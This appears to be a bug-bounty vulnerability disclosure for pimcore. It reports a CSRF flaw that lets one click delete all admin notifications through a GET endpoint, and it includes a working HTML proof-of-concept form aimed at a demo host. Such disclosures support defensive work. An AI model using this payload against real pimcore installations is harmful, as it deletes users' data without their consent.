Cross-Site Request Forgery (CSRF) in pimcore/pimcore
Jul 30th 2021
Your application have not any CSRF protection and also You set the
SameSite attribute to
Lax, this means if you want to alter some data with GET HTTP requests, then your site should be vulnerable to CSRF attacks with no doubt.
First you run this Html payload and then you should see that the all notifications been deleted .
🕵️♂️ Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://x.pimcore.fun/admin/notification/delete-all"> <input type="hidden" name="_dc" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
I test this Payload on both stable and dev Editions.(on
This vulnerability is capable of delete any notification only with one click.